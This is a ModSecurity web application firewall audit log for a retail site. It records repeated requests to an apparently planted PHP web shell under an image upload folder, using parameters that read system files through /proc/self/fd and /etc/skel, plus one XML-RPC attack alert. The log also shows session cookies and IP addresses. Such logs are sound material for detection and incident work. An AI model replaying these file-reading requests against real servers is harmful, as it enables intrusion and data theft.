Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --58932f26-Z-- --73c5ef08-A-- [17/Jun/2025:06:11:08.421187 +0530] aFC5pABFs81uFEfQOXaeKwAAAAM 216.73.216.240 51784 127.0.0.1 7081 --73c5ef08-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Fskel&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Fskel%2F.profile HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --73c5ef08-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3370 Connection: close Content-Type: text/html; charset=UTF-8 --73c5ef08-H-- Message: Warning. Matched phrase ".profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .profile found within ARGS:viewfile: /proc/thread-self/root/etc/skel/.profile"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .profile found within ARGS:viewfile: /proc/thread-self/root/etc/skel/.profile"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5pABFs81uFEfQOXaeKwAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120868417341 3899 (- - -) Stopwatch2: 1750120868417341 3899; combined=2066, p1=342, p2=1602, p3=35, p4=32, p5=55, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --73c5ef08-Z-- --a7a00b4c-A-- [17/Jun/2025:06:11:11.519732 +0530] aFC5p4iFNOCfBactc_VF1gAAAAE 216.73.216.240 45418 127.0.0.1 7081 --a7a00b4c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F75 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --a7a00b4c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2988 Connection: close Content-Type: text/html; charset=UTF-8 --a7a00b4c-H-- Message: Warning. Matched phrase "proc/self/fd/7" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/7 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/75"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/7" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/7 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/75"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5p4iFNOCfBactc_VF1gAAAAE"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120871514268 5518 (- - -) Stopwatch2: 1750120871514268 5518; combined=3005, p1=471, p2=2382, p3=49, p4=48, p5=55, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a7a00b4c-Z-- --c511ac63-A-- [17/Jun/2025:06:11:12.157018 +0530] aFC5qAJ4p5Cdblnjra6CwgAAAAI 216.73.216.240 45474 127.0.0.1 7081 --c511ac63-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F70 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --c511ac63-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2988 Connection: close Content-Type: text/html; charset=UTF-8 --c511ac63-H-- Message: Warning. Matched phrase "proc/self/fd/7" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/7 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/70"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/7" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/7 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/70"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5qAJ4p5Cdblnjra6CwgAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120872152542 4530 (- - -) Stopwatch2: 1750120872152542 4530; combined=2390, p1=363, p2=1896, p3=38, p4=36, p5=57, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c511ac63-Z-- --578eb102-A-- [17/Jun/2025:06:11:13.522207 +0530] aFC5qYiFNOCfBactc_VF2QAAAAE 216.73.216.240 45660 127.0.0.1 7081 --578eb102-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F150 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --578eb102-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2990 Connection: close Content-Type: text/html; charset=UTF-8 --578eb102-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/150"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/150"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5qYiFNOCfBactc_VF2QAAAAE"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120873517823 4448 (- - -) Stopwatch2: 1750120873517823 4448; combined=2323, p1=454, p2=1744, p3=36, p4=35, p5=54, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --578eb102-Z-- --1cf5c120-A-- [17/Jun/2025:06:11:14.795702 +0530] aFC5qooVQnPDyHnl9oPeVQAAAAY 216.73.216.240 45846 127.0.0.1 7081 --1cf5c120-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F170 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --1cf5c120-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2990 Connection: close Content-Type: text/html; charset=UTF-8 --1cf5c120-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/170"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/170"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5qooVQnPDyHnl9oPeVQAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120874791342 4416 (- - -) Stopwatch2: 1750120874791342 4416; combined=2274, p1=348, p2=1788, p3=39, p4=35, p5=63, sr=94, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1cf5c120-Z-- --4e1b5510-A-- [17/Jun/2025:06:11:15.616661 +0530] aFC5q9yZ4SMykfn97vzCGQAAAAs 216.73.216.240 45940 127.0.0.1 7081 --4e1b5510-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F166 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --4e1b5510-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2990 Connection: close Content-Type: text/html; charset=UTF-8 --4e1b5510-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/166"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/166"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5q9yZ4SMykfn97vzCGQAAAAs"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120875611357 5379 (- - -) Stopwatch2: 1750120875611357 5379; combined=2916, p1=428, p2=2316, p3=48, p4=45, p5=79, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4e1b5510-Z-- --354cb912-A-- [17/Jun/2025:06:11:15.980921 +0530] aFC5q4oVQnPDyHnl9oPeVwAAAAY 216.73.216.240 45990 127.0.0.1 7081 --354cb912-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F174 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --354cb912-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2989 Connection: close Content-Type: text/html; charset=UTF-8 --354cb912-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/174"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/174"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5q4oVQnPDyHnl9oPeVwAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120875977505 3470 (- - -) Stopwatch2: 1750120875977505 3470; combined=1790, p1=257, p2=1421, p3=32, p4=31, p5=49, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --354cb912-Z-- --18fa1664-A-- [17/Jun/2025:06:11:16.436263 +0530] aFC5rABFs81uFEfQOXaeNQAAAAM 216.73.216.240 46028 127.0.0.1 7081 --18fa1664-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F154 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --18fa1664-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2990 Connection: close Content-Type: text/html; charset=UTF-8 --18fa1664-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/154"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/154"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5rABFs81uFEfQOXaeNQAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120876431904 4424 (- - -) Stopwatch2: 1750120876431904 4424; combined=2361, p1=387, p2=1845, p3=37, p4=34, p5=58, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --18fa1664-Z-- --2f64c931-A-- [17/Jun/2025:06:11:52.005292 +0530] aFC5ztyZ4SMykfn97vzCKAAAAAs 146.190.105.35 37320 127.0.0.1 7081 --2f64c931-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 Cookie: PHPSESSID=j0b3n3m8nnmk5k7npg6mn1bmre; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_4ce85aa3920753026eade3eae75385%7C%7C1750293710%7C%7C1750290110%7C%7C89af9fc69d0da749e29c26a1de01737a; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=47693f804447cd363a6a4798609aa8dc%7C%7C1750293710%7C%7C1750290110%7C%7C01136925e6741a75644c2006843120e3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --2f64c931-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=qm10ovg8plfq927phda2a78hv4; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_88142149170f4cfe3d2fd823b87ed7%7C%7C1750293711%7C%7C1750290111%7C%7C6da7ad2a613778603a50248cab683d4e; expires=Thu, 19 Jun 2025 00:41:51 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=91e3aa3f4986b9dbbbc61c340b267e4b%7C%7C1750293711%7C%7C1750290111%7C%7C95fcf4d5e3d7f5a21e4ba07dfc9a7bdf; expires=Thu, 19 Jun 2025 00:41:51 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --2f64c931-E-- --2f64c931-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFC5ztyZ4SMykfn97vzCKAAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750120910943044 1062369 (- - -) Stopwatch2: 1750120910943044 1062369; combined=3233, p1=423, p2=2263, p3=120, p4=39, p5=237, sr=96, sw=151, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2f64c931-Z-- --3aea180c-A-- [17/Jun/2025:06:11:56.040632 +0530] aFC51ABFs81uFEfQOXaeTgAAAAM 216.73.216.240 38016 127.0.0.1 7081 --3aea180c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F143 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --3aea180c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2989 Connection: close Content-Type: text/html; charset=UTF-8 --3aea180c-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/143"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/143"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC51ABFs81uFEfQOXaeTgAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120916037649 3037 (- - -) Stopwatch2: 1750120916037649 3037; combined=1526, p1=261, p2=1170, p3=24, p4=27, p5=44, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3aea180c-Z-- --9bf94067-A-- [17/Jun/2025:06:11:57.098676 +0530] aFC51dyZ4SMykfn97vzCLgAAAAs 216.73.216.240 38196 127.0.0.1 7081 --9bf94067-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F57 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --9bf94067-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2988 Connection: close Content-Type: text/html; charset=UTF-8 --9bf94067-H-- Message: Warning. Matched phrase "proc/self/fd/5" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/5 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/57"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/5" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/5 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/57"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC51dyZ4SMykfn97vzCLgAAAAs"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120917094810 3920 (- - -) Stopwatch2: 1750120917094810 3920; combined=2002, p1=324, p2=1568, p3=29, p4=30, p5=51, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9bf94067-Z-- --4f1c167d-A-- [17/Jun/2025:06:11:57.280448 +0530] aFC51YoVQnPDyHnl9oPecQAAAAY 216.73.216.240 38212 127.0.0.1 7081 --4f1c167d-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F194 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --4f1c167d-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2990 Connection: close Content-Type: text/html; charset=UTF-8 --4f1c167d-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/194"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/194"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC51YoVQnPDyHnl9oPecQAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120917276519 3984 (- - -) Stopwatch2: 1750120917276519 3984; combined=2124, p1=390, p2=1588, p3=35, p4=32, p5=78, sr=84, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4f1c167d-Z-- --680a625f-A-- 